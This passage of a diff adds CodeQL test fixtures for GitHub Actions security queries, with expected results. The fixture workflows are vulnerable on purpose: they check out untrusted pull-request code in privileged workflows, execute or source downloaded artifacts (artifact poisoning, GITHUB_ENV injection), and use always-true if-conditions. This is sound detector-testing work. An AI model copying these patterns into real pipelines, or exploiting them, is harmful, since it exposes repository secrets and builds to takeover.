Step: slack-id | +| .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | +| .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | .github/workflows/test6.yml:213:7:218:4 | Uses Step | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | +| .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | +| .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | +#select +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref new file mode 100644 index 000000000000..f924f8fe750c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected new file mode 100644 index 000000000000..4f7149b69803 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -0,0 +1,2 @@ +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref new file mode 100644 index 000000000000..6284c786b3ae --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml new file mode 100644 index 000000000000..bbbcc5aaa791 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -0,0 +1,111 @@ +name: Event + +on: + workflow_dispatch: + +jobs: + if-tests: + runs-on: ubuntu-latest + permissions: {} + steps: + - name: Test 1 + if: 1 == 2 + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ 1 == 2 }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ 1 == 2 }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ 1 == 2 }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + 1 == 2 || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + 1 == 2 || + 3 == 4 }} + - name: Test 9 + if: '${{ 1 == 2 }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{1 == 2 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ 1 == 2 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ 1 == 2 }}" + run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + 1 == 2 || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || 1 == 2 + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || 1 == 2 + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.event_name }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml new file mode 100644 index 000000000000..8b863037e29b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -0,0 +1,111 @@ +name: Event + +on: + workflow_dispatch: + +jobs: + if-tests: + runs-on: ubuntu-latest + permissions: {} + steps: + - name: Test 1 + if: github.actor == "foo" + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ github.actor == "foo" }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ github.actor == "foo" }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + github.actor == "foo" || + 3 == 4 }} + - name: Test 9 + if: '${{ github.actor == "foo" }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{ github.actor == 111 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ github.actor == 111 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ github.actor == 111 }}" + run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + github.actor == "foo" || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.actor }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ github.actor }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.actor == 'foo' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected new file mode 100644 index 000000000000..2ef457d9e01a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected @@ -0,0 +1,11 @@ +| .github/workflows/test2.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test2.yml:34:13:34:54 | ${{ 1 = ... foo" }} | Expression always evaluates to true | +| .github/workflows/test2.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test2.yml:56:15:56:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:59:15:59:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test2.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test2.yml:91:13:91:40 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test2.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test2.yml:97:13:97:37 | ${{ git ... } != "" | Expression always evaluates to true | +| .github/workflows/test2.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref new file mode 100644 index 000000000000..823f802a70f2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected new file mode 100644 index 000000000000..c853603377cf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected @@ -0,0 +1,11 @@ +| .github/workflows/test1.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test1.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test1.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test1.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test1.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test1.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:94:13:94:121 | ${{ con ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test1.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref new file mode 100644 index 000000000000..f12135bd1b88 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml new file mode 100644 index 000000000000..cd4f0fe660aa --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -0,0 +1,13 @@ +name: Dangerous git Checkout +description: "Git Checkout from PR code so we can run checks from forks" +runs: + using: "composite" + steps: + - name: Checkout repo + uses: actions/checkout@4 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 2 + - run: echo "foo" + shell: bash + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 000000000000..4241647d3e11 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml new file mode 100644 index 000000000000..0c2059521020 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml new file mode 100644 index 000000000000..08a25646d6ae --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml @@ -0,0 +1,26 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + if: ${{ github.actor == "admin" }} + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml new file mode 100644 index 000000000000..7eaee9fa6d38 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + - id: pr_number + run: | + PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml new file mode 100644 index 000000000000..f8d3736dba51 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml @@ -0,0 +1,41 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip -d sonarcloud-data + ls -a sonarcloud-data + - name: Run command + run: + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml new file mode 100644 index 000000000000..aa884b7eca74 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -0,0 +1,40 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip + ls -a sonarcloud-data + - name: Run command + run: + python foo/x.py + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml new file mode 100644 index 000000000000..e73548895d37 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -0,0 +1,23 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + path: foo + - name: Run command + run: | + sh foo/cmd + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml new file mode 100644 index 000000000000..ac970fff8404 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + - name: Run command + run: sh cmd + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml new file mode 100644 index 000000000000..0e7c6f97cf5d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml @@ -0,0 +1,22 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Run command + run: ./foo/cmd + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml new file mode 100644 index 000000000000..7a837ee42d2c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip artifact_name.zip -d bar + - name: Run command + run: | + ./bar/cmd + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml new file mode 100644 index 000000000000..39ec063c7b64 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Run command + run: | + ./bar/cmd + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml new file mode 100644 index 000000000000..905a4eaccb17 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml new file mode 100644 index 000000000000..afa3e15132e3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "foo" "$name.zip" + done + - name: Run command + run: ./foo/cmd + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml new file mode 100644 index 000000000000..d3100d46edc7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip "$name.zip" + done + - name: Run command + run: ./cmd + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 000000000000..71f590fbc9c7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,20 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 000000000000..e4845a6f2f16 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,26 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 000000000000..67209267b5c5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git 